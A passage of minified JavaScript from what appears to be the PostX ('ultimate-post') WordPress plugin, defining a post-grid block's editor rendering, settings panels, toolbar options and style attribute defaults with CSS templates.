Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:$e}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:$e})),(0,o.createElement)("div",Je,Ke&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ke}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:A,setAttributes:U,onClick:()=>{Ve("heading"),Ge("heading")},setSection:Ve,setToolbarSettings:Ge}),function(){const e=`${ve}`,t=(e,t)=>(0,b.o6)()&&Be&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ue,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ge(t)},selectedDC:l.selectedDC,setSelectedDc:Fe,setAttributes:U,dcFields:Ue});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading...","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${de} ultp-block-content-${me}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(te.replaceAll("u0022",'"')):JSON.parse(le.replaceAll("u0022",'"')),c=0==a?Ee:Se;return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ultp-block-item-${a} ${ge?"ultp-animation-"+ge:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.MV,{imgOverlay:ee,imgOverlayType:Q,imgAnimation:X,post:l,fallbackEnable:Pe,vidIconEnable:Le,catPosition:K,showImage:V,idx:a,showSmallCat:oe,imgSize:c,Category:0!=a&&!oe||"aboveTitle"==K?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:W,catStyle:$,catPosition:K,customCatColor:ye,onlyCatColor:be,onClick:e=>{Ve("taxonomy-/-category"),Ge("cat")}})),onClick:()=>{Ve("image"),Ge("image")}}),Le&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Ve("video"),Ge("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${re}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==K&&(0==a||oe)&&(0,o.createElement)(i.Z,{post:l,catShow:W,catStyle:$,catPosition:K,customCatColor:ye,onlyCatColor:be,onClick:e=>{Ve("taxonomy-/-category"),Ge("cat")}}),t(6,l.ID),l.title&&q&&1==J&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{Ve("title"),Ge("title")}}),t(5,l.ID),(0==a||F)&&z&&"top"==ce&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:G,metaStyle:D,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{Ve("meta"),Ge("meta")}}),t(4,l.ID),l.title&&q&&0==J&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{Ve("title"),Ge("title")}}),t(3,l.ID),(0==a||pe)&&Y&&(0,o.createElement)("div",{className:"ultp-block-excerpt"},(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:R,showFullExcerpt:ue,showSeoMeta:fe,onClick:e=>{Ve("excerpt"),Ge("excerpt")}})),t(2,l.ID),(0==a||se)&&ae&&(0,o.createElement)(u.Z,{readMoreText:ie,readMoreIcon:ne,titleLabel:l.title,onClick:()=>{Ve("read-more"),Ge("read-more")}}),t(1,l.ID),(0==a||F)&&z&&"bottom"==ce&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:G,metaStyle:D,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{Ve("meta"),Ge("meta")}}),t(0,l.ID),(0,b.o6)()&&Be&&(0,o.createElement)(v.Z,{dcFields:Ue,setAttributes:U,startOnboarding:We,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ie})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{Ve("pagination"),Ge("pagination")}}))))}},71766:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8;function b({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=e.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=e;return g((()=>{(0,m.CH)(d,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6834",store:e}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:6,label:__("Number of Post","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:y.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","columnGridGap","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-6",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg6/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg6/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:4,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:y.meta,exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:{...a.WJ,tab:"settings"}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:e,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{depend:"headingShow",store:e,isTab:!0,initialOpen:y.heading}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{pro:!0,isTab:!0,store:e,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{pro:!0,isTab:!0,initialOpen:y.pagination,depend:"paginationShow",store:e,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","pagiMargin","navPosition"]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:s,catPosition:p,titlePosition:c,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,s&&0==c,i&&"top"==y,s&&1==c,b&&"aboveTitle"==p];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"],exStyle:["pagiMargin","pagiPadding","navMargin"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},91962:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},columnFlip:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},anotherKey:"columnGridGap",style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-content-overlay  { height: calc({{overlayHeight}}/2 - {{columnGridGap}}px / 2 ); } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-row { max-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-empty-image {width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img {min-height: {{overlayHeight}};} \n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit;}\n          }"}]},queryNumber:{type:"string",default:"5",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > 